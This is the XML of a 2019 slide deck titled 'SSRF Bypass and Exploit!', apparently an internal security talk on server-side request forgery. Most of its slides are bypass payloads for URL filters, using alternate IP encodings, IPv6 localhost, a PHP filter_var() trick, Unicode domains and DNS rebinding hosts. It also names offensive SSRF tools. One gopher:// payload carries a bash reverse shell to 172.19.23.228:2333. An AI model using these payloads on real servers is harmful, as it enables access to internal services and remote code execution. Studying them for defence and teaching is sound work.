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6" r:id="rId6"/>
    <p:sldId id="259" r:id="rId7"/>
    <p:sldId id="270" r:id="rId8"/>
    <p:sldId id="264" r:id="rId9"/>
    <p:sldId id="262" r:id="rId10"/>
    <p:sldId id="265" r:id="rId11"/>
    <p:sldId id="263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8" r:id="rId23"/>
    <p:sldId id="260" r:id="rId24"/>
    <p:sldId id="277" r:id="rId25"/>
    <p:sldId id="279" r:id="rId2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SSRF Bypass and Exploit!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2019-01-13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Bypass all in one level 1/10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http://127.0.0.0:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8888</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>80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390265" y="2214880"/>
            <a:ext cx="673100" cy="1265555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713605" y="2203450"/>
            <a:ext cx="1056640" cy="1660525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787525" y="3805555"/>
            <a:ext cx="241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Readfile URL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Box 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5189855" y="3956685"/>
            <a:ext cx="3506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Parse URL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level 2/10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http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0.0.0.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>#@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>evil.com:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>80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level 3/10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63390" y="1372235"/>
            <a:ext cx="43078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level 4/15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Bypass filter_var() php function to SSRF:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>0://evil.com:80;http://google.com:80/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level 5/10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http://[::]:80/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>http://[::1]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>http://[::]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level 6/10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http://127.127.127.127</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>http://127.0.1.3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>http://127.0.0.0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level 7/10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http://0177.0.0.1/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>http://2130706433/ = http://127.0.0.1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>http://3232235521/ = http://192.168.0.1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>http://3232235777/ = http://192.168.1.1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level 8/10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http://0/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level 9/10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http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ = example.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>List:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿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level 10/10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10.0.0.1.xip.io</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>www.10.0.0.1.xip.io</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>mysite.10.0.0.1.xip.io</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>foo.bar.10.0.0.1.xip.io</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>nip.io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Introduce our Troop</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>What is SSRF?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SSRF Bypass</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SSRF Exploiting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https://github.com/swisskyrepo/SSRFmap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>https://github.com/samhaxr/XXRF-Shots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apple@macdeMacBook-Pro XXRF-Shots$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> sudo bash xxrf.sh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http://127.0.0.1/DoraBox/ssrf/ssrf.php?submit=submit&amp;url=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915" y="2245360"/>
            <a:ext cx="701802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Protocol in SSRF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760"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Make SSRF more Powerful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Exploting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File://</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>dict:// </a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>https://blog.chaitin.cn/gopher-attack-surfaces/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>gopher://127.0.0.1:80/_POST /exp.php HTTP/1.1%0d%0aHost: 127.0.0.1%0d%0aUser-Agent: curl/7.43.0%0d%0aAccept: */*%0d%0aContent-Length: 49%0d%0aContent-Type: application/x-www-form-urlencoded%0d%0a%0d%0ae=bash -i &gt;%2526 /dev/tcp/172.19.23.228/2333 0&gt;%25261null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8000">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Thanks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="8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About Our Troop</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3" descr="45FBC833D45F2DA6A3F7542E09B9347F"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:srcRect b="18504"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6414135" y="365125"/>
            <a:ext cx="5371465" cy="66274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8795" y="1691005"/>
            <a:ext cx="5688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rgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Technical sharing every 15 days</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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Prepare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python SimpleHTTPServer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>PHP Apache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What is SSRF?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Server Side Requests Forgery</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000"/>
              <a:t>What company have SSRF?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3425">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Google</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3425">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3425">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IBM</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3425">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3425">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TENCENT</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3425"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What can be done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*lxoV91ij1jd7FTXKiIb5k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0" y="-51435"/>
            <a:ext cx="8217535" cy="6960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Easy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/>
              <a:t>http://127.0.0.1/DoraBox/ssrf/ssrf.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>file_get_contents</a:t>
            </a:r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7380" y="2266950"/>
            <a:ext cx="6783070" cy="4142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URL Component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foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>://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domain:8080</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/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en-US"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>demo.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>aaaa=bbbb</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="FFC000"/>
              </a:solidFill>
            </a:endParaRP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            know it and it bypass it !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NOT Allowed!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70355"/>
            <a:ext cx="539496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1968</Words>
  <Application>WPS Presentation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PingFang SC</vt:lpstr>
      <vt:lpstr/>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>Songti SC</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>SSRF Bypass and Exploit!</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>About Our Troop</vt:lpstr>
      <vt:lpstr>Prepare</vt:lpstr>
      <vt:lpstr>What is SSRF?</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>Easy test</vt:lpstr>
      <vt:lpstr>URL Component</vt:lpstr>
      <vt:lpstr>NOT Allowed!</vt:lpstr>
      <vt:lpstr>Bypass all in one level 1/10</vt:lpstr>
      <vt:lpstr>level 2/10</vt:lpstr>
      <vt:lpstr>level 3/10</vt:lpstr>
      <vt:lpstr>level 4/15</vt:lpstr>
      <vt:lpstr>level 5/10</vt:lpstr>
      <vt:lpstr>level 6/10</vt:lpstr>
      <vt:lpstr>level 7/10</vt:lpstr>
      <vt:lpstr>level 8/10</vt:lpstr>
      <vt:lpstr>level 9/10</vt:lpstr>
      <vt:lpstr>level 10/10</vt:lpstr>
      <vt:lpstr>Tools</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>Protocol in SSRF</vt:lpstr>
      <vt:lpstr>Exploting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SSRF Bypass and Exploit!</dc:title>
  <dc:creator>apple</dc:creator>
  <cp:lastModifiedBy>apple</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-01-13T02:35:10Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-01-13T02:35:10Z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1033-2.3.2.774</vt:lpwstr>
  </property>
</Properties>
</file>